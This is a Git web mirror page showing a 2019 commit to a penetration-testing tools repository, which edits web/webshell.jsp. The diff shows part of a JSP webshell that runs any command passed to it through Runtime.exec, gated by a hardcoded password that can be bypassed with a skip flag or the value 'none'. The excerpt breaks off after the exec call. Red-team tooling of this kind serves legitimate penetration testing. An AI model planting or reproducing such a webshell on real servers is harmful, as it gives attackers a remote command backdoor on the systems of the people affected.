Git/mgeeky-Penetration-Testing-Tools
1
0
Fork 0
mirror of https://github.com/mgeeky/Penetration-Testing-Tools.git synced 2024-11-22 02:21:36 +01:00
Code Issues Packages Projects Releases Wiki Activity

Webshell.jsp updated

Browse Source
This commit is contained in:
mgeeky 2019-06-28 12:37:00 +02:00
parent e8b47cfe17
commit 685a6428ed
1 changed files with 8 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
web/webshell.jsp
View File

@ -3,16 +3,17 @@
<%@page import="java.io.*"%> <%@page import="java.io.*"%>
<%@page import="java.net.*"%> <%@page import="java.net.*"%>
<%! <%!
// =====================================================================
// Setup global password necessary to pass before using that webshell.
public String HardcodedPassword = "5eQzrXZHZwJNLvm6Q2b7PR6r";
// =====================================================================
public String execute(String pass, String cmd, Boolean skip) { public String execute(String pass, String cmd, Boolean skip) {
// ----------------------------------------
// CHANGE THIS HARDCODED PASSWORD
//
final String hardcodedPass = "brhQ5U7OzHdqpnTgKaCo6Zd";
StringBuilder res = new StringBuilder(); StringBuilder res = new StringBuilder();
if (cmd != null && cmd.length() > 0 && ((skip) || (pass.equals(hardcodedPass) || hardcodedPass.toLowerCase().equals("none")))){ if (cmd != null && cmd.length() > 0 && ((skip) || (pass.equals(HardcodedPassword) || HardcodedPassword.toLowerCase().equals("none")))){
try { try {
Process proc = Runtime.getRuntime().exec(cmd); Process proc = Runtime.getRuntime().exec(cmd);
OutputStream outs = proc.getOutputStream(); OutputStream outs = proc.getOutputStream();